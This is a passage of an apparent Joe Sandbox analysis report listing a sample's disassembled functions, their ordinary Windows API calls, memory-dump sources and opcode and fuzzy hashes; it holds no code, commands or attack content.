                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Find$FileFirst$CloseErrorLast
                                          • String ID:
                                          • API String ID: 1464966427-0
                                          • Opcode ID: 553663d6344238db6cacc14b2898b3037eafe3250716d9c6bc636f8cf3ac924c
                                          • Instruction ID: dd08618b3d8364c185cee5c24a36b51342611f94d0bbc9a41c2821813987ab25
                                          • Opcode Fuzzy Hash: 553663d6344238db6cacc14b2898b3037eafe3250716d9c6bc636f8cf3ac924c
                                          • Instruction Fuzzy Hash: BEF08232408790AADB2277B48D05BDB7B90AF1A331F088A4AF1FD52196C27950D4AB23
                                          Function 00F90E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00F90E3D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ExecutionStateThread
                                          • String ID:
                                          • API String ID: 2211380416-0
                                          • Opcode ID: be6bdc42fb611925c0b8c587ca5e6b28899d3498c770513342a9f710ad1670c6
                                          • Instruction ID: ba81515427bd8a62c5055d0d0e3431c99ad1c1758d53b4d660cbb6310f154d2e
                                          • Opcode Fuzzy Hash: be6bdc42fb611925c0b8c587ca5e6b28899d3498c770513342a9f710ad1670c6
                                          • Instruction Fuzzy Hash: 6ED01211A5105A5AEE1137286E56BFE3507AFC7321F0D0165B14597183CE5D4886B261
                                          Function 00F9A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GdipAlloc.GDIPLUS(00000010), ref: 00F9A62C
                                            • Part of subcall function 00F9A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F9A3DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                          • String ID:
                                          • API String ID: 1915507550-0
                                          • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                          • Instruction ID: 5684540fa08ff715e86e53db0bfcfbfca014ef5d68758e3be47b19f24f7dc128
                                          • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                          • Instruction Fuzzy Hash: A0D0C77161020976FF416F618C1297E75D5EB41350F048125B841D5151EAB5D910B592
                                          Function 00F9E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DloadProtectSection.DELAYIMP ref: 00F9E5E3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DloadProtectSection
                                          • String ID:
                                          • API String ID: 2203082970-0
                                          • Opcode ID: 9951492cf2d625cf86b692b9d14e710cd1fed6fd4e2cc744fbbfcf0bf0fcc310
                                          • Instruction ID: 0d9c753ac99a5b14d1d1d9c13a432b4c0dfcb799af5d8fb52a1a67ef30f4c690
                                          • Opcode Fuzzy Hash: 9951492cf2d625cf86b692b9d14e710cd1fed6fd4e2cc744fbbfcf0bf0fcc310
                                          • Instruction Fuzzy Hash: 60D0C9B0980284ABFE06EBAEADC67A63755B324B14FA80105F185E5495DA788480BA06
                                          Function 00F9DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00F91B3E), ref: 00F9DD92
                                            • Part of subcall function 00F9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                            • Part of subcall function 00F9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                            • Part of subcall function 00F9B568: IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                            • Part of subcall function 00F9B568: TranslateMessage.USER32(?), ref: 00F9B5AC
                                            • Part of subcall function 00F9B568: DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                          • String ID:
                                          • API String ID: 897784432-0
                                          • Opcode ID: d9593cfd6cfb569f916c310078ab33a1a8d63f9057904311e8cbe295c47c9803
                                          • Instruction ID: e43d8f2ac84a72c02e4c35975d61ba54b636a89f9d7c61ce6bafca7ce7421bf4
                                          • Opcode Fuzzy Hash: d9593cfd6cfb569f916c310078ab33a1a8d63f9057904311e8cbe295c47c9803
                                          • Instruction Fuzzy Hash: 03D09E31544300BAEA016B51DE0AF1A7AA2AB88B08F004555B284750B1CA769D21FB11
                                          Function 00F898BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileType.KERNEL32(000000FF,00F897BE), ref: 00F898C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FileType
                                          • String ID:
                                          • API String ID: 3081899298-0
                                          • Opcode ID: 7a6a704feeb242232712f98c486e95630b80d09e45265b8d906e1ceefb4067c4
                                          • Instruction ID: 87fbfd66e720c6bd3b5d3424e03836bd54115a1a4036a967eac5514f2ac96898
                                          • Opcode Fuzzy Hash: 7a6a704feeb242232712f98c486e95630b80d09e45265b8d906e1ceefb4067c4
                                          • Instruction Fuzzy Hash: 85C00234808106958F61662498450E57711AF533B97F89794D069850A1C362CC57FB11
                                          Function 00F9E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: bed479a1aa62fa4c5e13b3466b74d36ee2e8cf1d04c65c69acd0d0ccb34082b6
                                          • Instruction ID: bfd612b6159dd22a398c918ca8925c821189c2a9e5560c6d41e094409ef0c250
                                          • Opcode Fuzzy Hash: bed479a1aa62fa4c5e13b3466b74d36ee2e8cf1d04c65c69acd0d0ccb34082b6
                                          • Instruction Fuzzy Hash: 8BB012D2268041BC3504D2471D0AE37010CC2C1B10330C03EFC05C51C1DC44ECC83872
                                          Function 00F9E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 28bc128e655e4fd3f7e535b971b6e6d34666c7cd5cb1b4c36b0778da790b52d6
                                          • Instruction ID: f7ce7f6db0b27062957574d1528b2a718b19c994fc3051a4a1a999bbafaa3703
                                          • Opcode Fuzzy Hash: 28bc128e655e4fd3f7e535b971b6e6d34666c7cd5cb1b4c36b0778da790b52d6
                                          • Instruction Fuzzy Hash: 82B012D626C141EC3504D18B1D0AE37010CC2C0B10330407EF805C5081DC44ACC43972
                                          Function 00F9E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 1f6e9353cf4448dec96163b89a2b1b91a8c400e0f076fc98ba9b03cbbdd9b19c
                                          • Instruction ID: 2b81f62b7c3394a80756f2d6319af2eba479f52249bdc5de21b27809613cea43
                                          • Opcode Fuzzy Hash: 1f6e9353cf4448dec96163b89a2b1b91a8c400e0f076fc98ba9b03cbbdd9b19c
                                          • Instruction Fuzzy Hash: 20B012D6268141BC350491871D0AD37010CC2C1B10330843EFC01C4481DC44ECC43872
                                          Function 00F9EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9EAF9
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: bac0e1833c86a6f877fcaa7d40e7417ee4699e7fded25889ed607045fc361d74
                                          • Instruction ID: 0f7d975e466792bfe96c9588a40c7588230b3bb2b5f66e3f14f03ad0988cbb38
                                          • Opcode Fuzzy Hash: bac0e1833c86a6f877fcaa7d40e7417ee4699e7fded25889ed607045fc361d74
                                          • Instruction Fuzzy Hash: A4B012C72AA0827C3904E2431D0AD77030DC0D0BA0330842EF604C4492EC854C013872
                                          Function 00F9E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: fa127c5ff864da55951efb19a36d660be321fae6409ab8211dc05bb2276e8b4a
                                          • Instruction ID: e39eae94441792d0621048677eac1443dbcb432d8ac4c1b261c6a5a66b4e4a1a
                                          • Opcode Fuzzy Hash: fa127c5ff864da55951efb19a36d660be321fae6409ab8211dc05bb2276e8b4a
                                          • Instruction Fuzzy Hash: FBB012E2268041EC3504D1471E0AE37018CC2C0B10330403EF805C5081DC45ADC53872
                                          Function 00F9E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: c6270ed1bd01bbc8bcb5c2c45afaada81d129853f6dd915b9e8b1ceeb4565220
                                          • Instruction ID: 321b04a7fcc96b06e67dddbc0276cd32ddbba779754c16f3537115bee34cbbf8
                                          • Opcode Fuzzy Hash: c6270ed1bd01bbc8bcb5c2c45afaada81d129853f6dd915b9e8b1ceeb4565220
                                          • Instruction Fuzzy Hash: C1B012D2268041AC3504D1571D0AE37014CC2C1B10330803EFC05C5081DC44ECC43872
                                          Function 00F9E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 1e7b15d6bed36aabe0f07690542f64eb192fa6d3bc6d3633fb92eeaa7deceadc
                                          • Instruction ID: cf04a9ce8237d933bad5615259855340d591c9f445d496141e70dcbf60e8dec9
                                          • Opcode Fuzzy Hash: 1e7b15d6bed36aabe0f07690542f64eb192fa6d3bc6d3633fb92eeaa7deceadc
                                          • Instruction Fuzzy Hash: FAB012D2279081AC3504D1471D0AE37014DC6C0B10330407EF806C5081DC54ACC43872
                                          Function 00F9E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: ff2d7959a85134721dd636c2d4cb63d4f7aad701a8893485ecf6df6530636889
                                          • Instruction ID: 944b67cf3940ddb1c23b76eeb33b380fc61789d49570b8f89e4cbba80fb76ea9
                                          • Opcode Fuzzy Hash: ff2d7959a85134721dd636c2d4cb63d4f7aad701a8893485ecf6df6530636889
                                          • Instruction Fuzzy Hash: 18B012E2269181BC3544D2471D0AE3B010DC2C0B10330413EF805C5081DC54ACC83872
                                          Function 00F9E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: fb1a69eb7b05946c055f0d8c81c907ac0c7e1a74022b4cdc60623159f182e9a7
                                          • Instruction ID: 38cec861043639e68784142c4653f5a0283f80368368f4179c445de436b9125a
                                          • Opcode Fuzzy Hash: fb1a69eb7b05946c055f0d8c81c907ac0c7e1a74022b4cdc60623159f182e9a7
                                          • Instruction Fuzzy Hash: C4B012D2269081AC3504D1471D0AE37010DC2C1B10330803EFC05C5081DC54ECC43872
                                          Function 00F9E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
